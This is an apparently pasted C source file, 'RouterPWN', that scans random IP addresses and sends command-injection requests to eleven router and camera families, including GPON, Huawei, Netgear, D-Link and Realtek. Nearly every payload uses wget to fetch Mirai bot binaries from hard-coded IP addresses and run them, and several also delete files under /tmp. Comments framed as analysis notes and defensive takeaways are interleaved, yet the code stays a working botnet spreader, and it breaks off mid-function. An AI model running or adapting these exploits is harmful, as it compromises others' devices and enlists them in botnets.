
[RouterPWN][SHIT]

xB4ckdoorREAL Nov 7th, 2018 (edited) 97 Never
  1. //DISCORD: https://discord.gg/PTW3yPp  skype: b4ckdoor.porn
  2. //RouterPwn Proof of Concept
  3. //Target 12 different router exploits
  4. //Don't forget to edit your payloads
  5.  
  6. #include <stdlib.h>
  7. #include <stdarg.h>
  8. #include <stdio.h>
  9. #include <sys/socket.h>
  10. #include <sys/types.h>
  11. #include <netinet/in.h>
  12. #include <arpa/inet.h>
  13. #include <netdb.h>
  14. #include <signal.h>
  15. #include <strings.h>
  16. #include <string.h>
  17. #include <sys/utsname.h>
  18. #include <unistd.h>
  19. #include <fcntl.h>
  20. #include <errno.h>
  21. #include <netinet/udp.h>
  22. #include <netinet/tcp.h>
  23. #include <sys/wait.h>
  24. #include <sys/ioctl.h>
  25. #include <net/if.h>
  26.  
  // First-octet candidates: GPON8080_IPGen indexes GPON1_Range and GPON80_IPGen indexes
  // GPON2_Range to choose the leading octet of each address it generates.
  27. int GPON1_Range [] = {187,189,200,201,207};
  28. int GPON2_Range [] = {1,2,5,31,37,41,42,58,62,78,82,84,88,89,91,92,95,103,113,118,145,147,178,183,185,195,210,212};
  29.  
  // scanner3_pid..scanner13_pid each receive a fork() result inside one exploit_socket_* function.
  // exploit_pid, scanner2_pid and this global `timeout` are not referenced in the part of the file
  // shown here (socket_connect_tcp declares its own local `timeout`).
  30. int exploit_pid, scanner2_pid, scanner3_pid, scanner4_pid, scanner5_pid, scanner6_pid, scanner7_pid, scanner8_pid, scanner9_pid, scanner10_pid, scanner11_pid, scanner12_pid, scanner13_pid, timeout = 100000;
  // Scratch octet buffer shared by every *_IPGen function: 40 bytes, i.e. room for ten IPv4 addresses.
  31. static uint8_t ipState[40] = {0};
  // max and i are not referenced in the part of the file shown here.
  32. int max = 0, i = 0;
  33.  
  // Resolves `host` with gethostbyname(), opens a TCP socket with a 3-second send timeout and
  // connects to `port`.
  // Returns the connected descriptor, or 0 when resolution, socket() or connect() fails; every
  // caller in this file treats a non-zero result as "connected".
  34. int socket_connect_tcp(char *host, in_port_t port) // tcp socket for sending POST/GET requests
  35. {  
  36.     struct hostent *hp;
  37.     struct sockaddr_in addr;
  38.     int on = 1, sock;    
  39.     struct timeval timeout;      
  40.     timeout.tv_sec = 3; // 3 sec timeout on socket
  41.     timeout.tv_usec = 0;
  42.     if ((hp = gethostbyname(host)) == NULL) return 0;
  43.     bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  44.     addr.sin_port = htons(port);
  45.     addr.sin_family = AF_INET;
  46.     sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
          // Only SO_SNDTIMEO is set (no receive timeout); `on` is declared but never used, and this
          // call runs before the sock == -1 check on the next line.
  47.     setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
  48.     if (sock == -1) return 0;
  49.     if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
  50.     return sock;
  51. }
  52.  
  53.  
  // Analysis note: forks a child (pid kept in scanner3_pid) that connects to host:8080 and writes
  // one fixed HTTP POST to /GponForm/diag_Form; the dest_host form field carries shell commands that
  // fetch a file from 188.212.103.208 into /tmp and run it with sh. The parent returns right after
  // fork(); the child always ends in exit(0).
  // Network indicators visible here: the request path, User-Agent "Hello, World", the hard-coded
  // "Host: 127.0.0.1:8080" header and the download URL.
  // No reply is read, so the "[Pwn] Found Exploitable Device" line only records that connect()
  // succeeded; it is not evidence that the device was vulnerable.
  // Defensive takeaway: keep the device's web management port unreachable from untrusted networks
  // and alert on diag_Form requests whose fields contain shell metacharacters.
  54. void exploit_socket_gpon8080(unsigned char *host)
  55. {
  56.     scanner3_pid = fork();
  57.    
  58.     if (scanner3_pid > 0 || scanner3_pid == -1)
  59.         return;
  60.  
  61.     int gpon_socket1;
  62.     char gpon_request1[1024];
  63.    
  64.     gpon_socket1 = socket_connect_tcp((char *)host, 8080);
  65.    
  66.     sprintf(gpon_request1, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://188.212.103.208/bins/mirai.mips+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0");
  67.    
  68.     if (gpon_socket1 != 0)
  69.     {
  70.         write(gpon_socket1, gpon_request1, strlen(gpon_request1));
  71.         usleep(200000);
  72.         close(gpon_socket1);
  73.         printf("[Pwn] Found Exploitable Device %s [GPON] [8080]\n", host);
  74.     }
  75.     exit(0);
  76. }
  77.  
  // Analysis note: same request as exploit_socket_gpon8080 but sent to host:80 from a child whose
  // pid is kept in scanner4_pid; the parent returns right after fork().
  // Indicators visible here: POST /GponForm/diag_Form, User-Agent "Hello, World", the hard-coded
  // "Host: 127.0.0.1:80" header, and a dest_host field that fetches from 188.212.103.208 into
  // /tmp/gpon80.
  // The success message is printed after any successful connect(); no reply is read.
  78. void exploit_socket_gpon80(unsigned char *host)
  79. {
  80.     scanner4_pid = fork();
  81.    
  82.     if (scanner4_pid > 0 || scanner4_pid == -1)
  83.         return;
  84.  
  85.     int gpon_socket2;
  86.     char gpon_request2[1024];
  87.    
  88.     gpon_socket2 = socket_connect_tcp((char *)host, 80);
  89.    
  90.     sprintf(gpon_request2, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://188.212.103.208/bins/mirai.mips+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0");
  91.    
  92.     if (gpon_socket2 != 0)
  93.     {
  94.         write(gpon_socket2, gpon_request2, strlen(gpon_request2));
  95.         usleep(200000);
  96.         close(gpon_socket2);
  97.         printf("[Pwn] Found Exploitable Device %s [GPON] [80]\n", host);
  98.     }
  99.     exit(0);
  100. }
  101.  
  // Analysis note: forks a child (pid kept in scanner5_pid) that connects to host:52869 and writes
  // two SOAP AddPortMapping requests to /picsdesc.xml, five seconds apart, on the same connection.
  // In both requests the NewInternalClient element holds backtick-wrapped shell commands: the first
  // fetches a file from 209.141.42.3 into /tmp, the second marks it executable and runs it.
  // Indicators visible here: TCP/52869, POST /picsdesc.xml, the WANIPConnection:1#AddPortMapping
  // SOAPAction, User-Agent "Hello, World", the description "syncthing" and ports 47500/44382.
  // The success message is printed after any successful connect(); no reply is read.
  // Defensive takeaway: this UPnP/SOAP port should not be exposed to the WAN; backticks inside
  // AddPortMapping fields are a reliable detection signal.
  102. void exploit_socket_realtek(unsigned char *host)
  103. {
  104.     scanner5_pid = fork();
  105.    
  106.     if (scanner5_pid > 0 || scanner5_pid == -1)
  107.         return;
  108.  
  109.     int realtek_socket;
  110.     char realtek_request[1024], realtek_request2[1024];
  111.    
  112.     realtek_socket = socket_connect_tcp((char *)host, 52869);
  113.    
  114.     sprintf(realtek_request, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf*; wget http://209.141.42.3/mirai.mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);
  115.     sprintf(realtek_request2, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;chmod +x mirai.mips;./mirai.mips realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);
  116.    
  117.     if (realtek_socket != 0)
  118.     {
  119.         write(realtek_socket, realtek_request, strlen(realtek_request));
  120.         sleep(5);
  121.         write(realtek_socket, realtek_request2, strlen(realtek_request2));
  122.         usleep(200000);
  123.         close(realtek_socket);
  124.         printf("[Pwn] Found Exploitable Device %s [REALTEK] [52869]\n", host);
  125.     }
  126.     exit(0);
  127. }
  128.  
  // Analysis note: forks a child (pid kept in scanner6_pid) that connects to host on both 8080 and
  // 80 and writes the same HTTP/1.0 GET to /setup.cgi on each connection that opened. The query
  // string sets todo=syscmd and a cmd value that clears /tmp, fetches a file from 188.212.103.208
  // and runs it with sh.
  // Indicators visible here: GET /setup.cgi with next_file=netgear.cfg, todo=syscmd and
  // currentsetting.htm=1 in the query string, plus the download URL.
  // Each success message is printed after a successful connect(); no reply is read.
  // Defensive takeaway: block WAN access to the router's web interface and alert on
  // setup.cgi requests carrying todo=syscmd.
  129. void exploit_socket_netgear(unsigned char *host)
  130. {
  131.     scanner6_pid = fork();
  132.    
  133.     if (scanner6_pid > 0 || scanner6_pid == -1)
  134.         return;
  135.  
  136.     int netgear_socket, netgear_socket2;
  137.     char netgear_request[1024];
  138.    
  139.     netgear_socket = socket_connect_tcp((char *)host, 8080);
  140.     netgear_socket2 = socket_connect_tcp((char *)host, 80);
  141.    
  142.     sprintf(netgear_request, "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://188.212.103.208/bins/mirai.mips+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n");
  143.  
  144.     if (netgear_socket != 0)
  145.     {
  146.         write(netgear_socket, netgear_request, strlen(netgear_request));
  147.         usleep(200000);
  148.         close(netgear_socket);
  149.         printf("[Pwn] Found Exploitable Device %s [NETGEAR] [8080]\n", host);
  150.     }
  151.     if (netgear_socket2 != 0)
  152.     {
  153.         write(netgear_socket2, netgear_request, strlen(netgear_request));
  154.         usleep(200000);
  155.         close(netgear_socket2);
  156.         printf("[Pwn] Found Exploitable Device %s [NETGEAR] [80]\n", host);
  157.     }
  158.     exit(0);
  159. }
  160.  
  // Analysis note: forks a child that connects to host:37215 and writes one SOAP "Upgrade" request
  // to /ctrlt/DeviceUpgrade_1. The NewStatusURL element holds a $(...) command substitution that
  // fetches a file from 188.212.103.208 with busybox wget and runs it. The pid is stored in
  // scanner6_pid, the same global exploit_socket_netgear uses.
  // Indicators visible here: TCP/37215, the request path, and a Digest Authorization header whose
  // username (dslf-config), realm (HuaweiHomeGateway), nonce, cnonce and response are all fixed
  // strings, so the header matches byte-for-byte on every attempt; the marker "HUAWEIUPNP" in
  // NewDownloadURL is likewise constant.
  // The success message is printed after any successful connect(); no reply is read.
  // Defensive takeaway: this port should not be reachable from the WAN; "$(" inside upgrade URL
  // fields is a detection signal.
  161. void exploit_socket_huawei(unsigned char *host)
  162. {
  163.     scanner6_pid = fork();
  164.    
  165.     if (scanner6_pid > 0 || scanner6_pid == -1)
  166.         return;
  167.  
  168.     int huawei_socket;
  169.     char huawei_request[1024];
  170.    
  171.     huawei_socket = socket_connect_tcp((char *)host, 37215);
  172.    
  173.     sprintf(huawei_request, "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 188.212.103.208 -l /tmp/huawei -r /mirai.mips;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>", host);
  174.    
  175.     if (huawei_socket != 0)
  176.     {
  177.         write(huawei_socket, huawei_request, strlen(huawei_request));
  178.         usleep(200000);
  179.         close(huawei_socket);
  180.         printf("[Pwn] Found Exploitable Device %s [HUAWEI] [37215]\n", host);
  181.     }
  182.     exit(0);
  183. }
  184.  
  // Analysis note: forks a child (pid kept in scanner7_pid) that connects to host on 7574 and 5555
  // and writes a SOAP SetNTPServers request to /UD/act?1 on each connection that opened. The
  // NewNTPServer1 element holds backtick-wrapped commands that fetch a file from 188.212.103.208
  // into /tmp and run it; NewNTPServer2..5 hold `echo DEATH`.
  // Indicators visible here: TCP/7574 and TCP/5555, POST /UD/act?1, the
  // dslforum-org:service:Time:1#SetNTPServers SOAPAction, User-Agent "Hello, world", a hard-coded
  // "Host: 127.0.0.1:<port>" header and the constant string DEATH.
  // Each success message is printed after a successful connect(); no reply is read.
  // Defensive takeaway: the TR-064 service belongs on the LAN side only; backticks in NTP server
  // fields are a detection signal.
  185. void exploit_socket_tr064(unsigned char *host)
  186. {
  187.     scanner7_pid = fork();
  188.    
  189.     if (scanner7_pid > 0 || scanner7_pid == -1)
  190.         return;
  191.  
  192.     int tr064_socket, tr064_socket2;
  193.     char tr064_request[1024], tr064_request2[1024];
  194.    
  195.     tr064_socket = socket_connect_tcp((char *)host, 7574);
  196.     tr064_socket2 = socket_connect_tcp((char *)host, 5555);
  197.    
  198.     sprintf(tr064_request, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://188.212.103.208/bins/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>");
  199.     sprintf(tr064_request2, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://188.212.103.208/bins/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>");
  200.    
  201.     if (tr064_socket != 0)
  202.     {
  203.         write(tr064_socket, tr064_request, strlen(tr064_request));
  204.         usleep(200000);
  205.         close(tr064_socket);
  206.         printf("[Pwn] Found Exploitable Device %s [TR-064] [7574]\n", host);
  207.     }
  208.     if (tr064_socket2 != 0)
  209.     {
  210.         write(tr064_socket2, tr064_request2, strlen(tr064_request2));
  211.         usleep(200000);
  212.         close(tr064_socket2);
  213.         printf("[Pwn] Found Exploitable Device %s [TR-064] [5555]\n", host);
  214.     }
  215.     exit(0);
  216. }
  217.  
  // Analysis note: forks a child (pid kept in scanner8_pid) that connects to host:80 and writes one
  // HTTP/1.0 POST to /HNAP1/. Here the shell commands sit in the SOAPAction request header itself
  // (backtick-wrapped, fetching a file from 188.212.103.208); the XML body is an ordinary-looking
  // AddPortMapping with description "foobar", client 192.168.0.100 and port 1234.
  // Indicators visible here: POST /HNAP1/, a SOAPAction header starting with
  // http://purenetworks.com/HNAP1/ followed by a backtick, and the constant body values.
  // The success message is printed after any successful connect(); no reply is read.
  // Defensive takeaway: inspect headers as well as bodies; a backtick in SOAPAction is a
  // detection signal, and HNAP should not be reachable from the WAN.
  218. void exploit_socket_hnap(unsigned char *host)
  219. {
  220.     scanner8_pid = fork();
  221.    
  222.     if (scanner8_pid > 0 || scanner8_pid == -1)
  223.         return;
  224.  
  225.     int hnap_socket;
  226.     char hnap_request[1024];
  227.    
  228.     hnap_socket = socket_connect_tcp((char *)host, 80);
  229.    
  230.     sprintf(hnap_request, "POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://188.212.103.208/bins/mirai.mips && chmod 777 /tmp/mirai.mips/ && /tmp/mirai.mips`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n", host);
  231.  
  232.     if (hnap_socket != 0)
  233.     {
  234.         write(hnap_socket, hnap_request, strlen(hnap_request));
  235.         usleep(200000);
  236.         close(hnap_socket);
  237.         printf("[Pwn] Found Exploitable Device %s [HNAP] [80]\n", host);
  238.     }
  239.     exit(0);
  240. }
  241.  
  // Analysis note: forks a child (pid kept in scanner9_pid) that connects to host:81 and writes one
  // HTTP/1.0 GET whose path begins /language/Swedish and continues with shell commands, using
  // ${IFS} where a space would normally appear; the commands fetch a file from 188.212.103.208.
  // Indicators visible here: TCP/81, a request path containing "/language/Swedish${IFS}" and the
  // trailing "/string.js", and the download URL.
  // The success message is printed after any successful connect(); no reply is read.
  // Defensive takeaway: "${IFS}" in a URL path is a strong detection signal; keep the device's web
  // interface off untrusted networks.
  242. void exploit_socket_crossweb(unsigned char *host)
  243. {
  244.     scanner9_pid = fork();
  245.    
  246.     if (scanner9_pid > 0 || scanner9_pid == -1)
  247.         return;
  248.  
  249.     int crossweb_socket;
  250.     char crossweb_request[1024];
  251.    
  252.     crossweb_socket = socket_connect_tcp((char *)host, 81);
  253.    
  254.     sprintf(crossweb_request, "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://188.212.103.208/bins/mirai.arm7;sh${IFS}/tmp/mirai.arm7&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n");
  255.  
  256.     if (crossweb_socket != 0)
  257.     {
  258.         write(crossweb_socket, crossweb_request, strlen(crossweb_request));
  259.         usleep(200000);
  260.         close(crossweb_socket);
  261.         printf("[Pwn] Found Exploitable Device %s [CROSSWEB] [81]\n", host);
  262.     }
  263.     exit(0);
  264. }
  265.  
  // Analysis note: forks a child (pid kept in scanner10_pid) that connects to host:80 and writes
  // one HTTP/1.1 GET to /shell whose query string is a '+'-separated command line that fetches a
  // file from 188.212.103.208 into /tmp and runs it.
  // Indicators visible here: GET /shell?..., User-Agent "Hello, world" and the download URL.
  // The success message is printed after any successful connect(); no reply is read.
  // Defensive takeaway: a web server that answers /shell requests should never be exposed to
  // untrusted networks; alert on any request for that path.
  266. void exploit_socket_jaws(unsigned char *host)
  267. {
  268.     scanner10_pid = fork();
  269.    
  270.     if (scanner10_pid > 0 || scanner10_pid == -1)
  271.         return;
  272.  
  273.     int jaws_socket;
  274.     char jaws_request[1024];
  275.    
  276.     jaws_socket = socket_connect_tcp((char *)host, 80);
  277.    
  278.     sprintf(jaws_request, "GET /shell?cd+/tmp;rm+-rf+*;wget+http://188.212.103.208/bins/mirai.arm7;chmod+777+mirai.arm7;/tmp/mirai.arm7+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", host);
  279.  
  280.     if (jaws_socket != 0)
  281.     {
  282.         write(jaws_socket, jaws_request, strlen(jaws_request));
  283.         usleep(200000);
  284.         close(jaws_socket);
  285.         printf("[Pwn] Found Exploitable Device %s [JAWS] [80]\n", host);
  286.     }
  287.     exit(0);
  288. }
  289.  
  // Analysis note: forks a child (pid kept in scanner11_pid) that connects to host:49152 and writes
  // one SOAP AddPortMapping request to /soap.cgi?service=WANIPConn1. The NewInternalClient element
  // holds backtick-wrapped commands that fetch a file from 188.212.103.208 into /tmp and run it.
  // Indicators visible here: TCP/49152, the request path, the
  // WANIPConnection:1#AddPortMapping SOAPAction, User-Agent "Hello, World" and ports 634/45.
  // The success message is printed after any successful connect(); no reply is read.
  // Defensive takeaway: UPnP SOAP endpoints should not be reachable from the WAN; backticks in
  // AddPortMapping fields are a detection signal.
  290. void exploit_socket_dlink(unsigned char *host)
  291. {
  292.     scanner11_pid = fork();
  293.    
  294.     if (scanner11_pid > 0 || scanner11_pid == -1)
  295.         return;
  296.  
  297.     int dlink_socket;
  298.     char dlink_request[1024];
  299.    
  300.     dlink_socket = socket_connect_tcp((char *)host, 49152);
  301.    
  302.     sprintf(dlink_request, "POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://188.212.103.208/bins/mirai.mips;/tmp/mirai.mips dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n", host);
  303.  
  304.     if (dlink_socket != 0)
  305.     {
  306.         write(dlink_socket, dlink_request, strlen(dlink_request));
  307.         usleep(200000);
  308.         close(dlink_socket);
  309.         printf("Pwn] Found Exploitable Device %s [DLINK] [49152]\n", host);
  310.     }
  311.     exit(0);
  312. }
  313.  
  // Analysis note: forks a child (pid kept in scanner12_pid) that connects to host:8443 and writes
  // a single GET line whose path starts /cgi-bin/; and continues with shell commands, using ${IFS}
  // in place of spaces; the commands fetch a file from 188.212.103.208 into /var/tmp.
  // Indicators visible here: TCP/8443, a path beginning "/cgi-bin/;" and containing "${IFS}", and
  // the download URL.
  // The success message is printed after any successful connect(); no reply is read.
  // Defensive takeaway: a ';' directly after /cgi-bin/ and "${IFS}" in the path are detection
  // signals; keep the router's web interface off untrusted networks.
  314. void exploit_socket_r7064(unsigned char *host)
  315. {
  316.     scanner12_pid = fork();
  317.    
  318.     if (scanner12_pid > 0 || scanner12_pid == -1)
  319.         return;
  320.  
  321.     int r7064_socket;
  322.     char r7064_request[1024];
  323.    
  324.     r7064_socket = socket_connect_tcp((char *)host, 8443);
  325.    
  326.     sprintf(r7064_request, "GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://188.212.103.208/bins/mirai.mips;${IFS}sh${IFS}/var/tmp/mirai.mips");
  327.  
  328.     if (r7064_socket != 0)
  329.     {
  330.         write(r7064_socket, r7064_request, strlen(r7064_request));
  331.         usleep(200000);
  332.         close(r7064_socket);
  333.         printf("[Pwn] Found Exploitable Device %s [R7064] [8443]\n", host);
  334.     }
  335.     exit(0);
  336. }
  337.  
  // Analysis note: forks a child (pid kept in scanner13_pid) that connects to host:8080 and writes
  // a single GET line for /board.cgi whose cmd parameter is a '+'-separated command line that
  // fetches a file from 188.212.103.208 into /tmp and runs it.
  // Indicators visible here: GET /board.cgi?cmd=..., the argument "varcron" and the download URL.
  // The success message is printed after any successful connect(); no reply is read.
  // Defensive takeaway: alert on board.cgi requests carrying a cmd parameter and keep the device's
  // web interface off untrusted networks.
  338. void exploit_socket_vacron(unsigned char *host)
  339. {
  340.     scanner13_pid = fork();
  341.    
  342.     if (scanner13_pid > 0 || scanner13_pid == -1)
  343.         return;
  344.  
  345.     int vacron_socket;
  346.     char vacron_request[1024];
  347.    
  348.     vacron_socket = socket_connect_tcp((char *)host, 8080);
  349.    
  350.     sprintf(vacron_request, "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://188.212.103.208/bins/mirai.arm7;chmod+777+mirai.arm7;/tmp/mirai.arm7+varcron");
  351.  
  352.     if (vacron_socket != 0)
  353.     {
  354.         write(vacron_socket, vacron_request, strlen(vacron_request));
  355.         usleep(200000);
  356.         close(vacron_socket);
  357.         printf("Pwn] Found Exploitable Device %s [VACRON] [8080]\n", host);
  358.     }
  359.     exit(0);
  360. }
  // Builds six dotted-quad strings and passes each to exploit_socket_gpon8080, which forks once per
  // address. The first octet of each address is taken from GPON1_Range; the other three are
  // rand() % 255 (0-254). rand() is reseeded from time(NULL) on every call, and the octets are
  // staged in the shared ipState buffer (slots 0-23).
  // Seen from the network this is unsolicited TCP/8080 traffic to scattered addresses, i.e. a
  // scanning pattern rather than access to a known host.
  361. void GPON8080_IPGen()
  362. {
  363.     char gpon_ip1[16] = {0};char gpon_ip2[16] = {0};char gpon_ip3[16] = {0};
  364.     char gpon_ip4[16] = {0};char gpon_ip5[16] = {0};char gpon_ip6[16] = {0};
  365.    
  366.     srand(time(NULL));
  367.     int gpon_range1 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range2 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range3 = rand() % (sizeof(GPON1_Range)/sizeof(char *));
  368.     int gpon_range4 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range5 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range6 = rand() % (sizeof(GPON1_Range)/sizeof(char *));
  369.    
  370.     ipState[0] = GPON1_Range[gpon_range1];ipState[4] = GPON1_Range[gpon_range2];ipState[8] = GPON1_Range[gpon_range3];
  371.     ipState[12] = GPON1_Range[gpon_range4];ipState[16] = GPON1_Range[gpon_range5];ipState[20] = GPON1_Range[gpon_range6];
  372.     ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
  373.     ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
  374.     ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;
  375.    
  376.     sprintf(gpon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
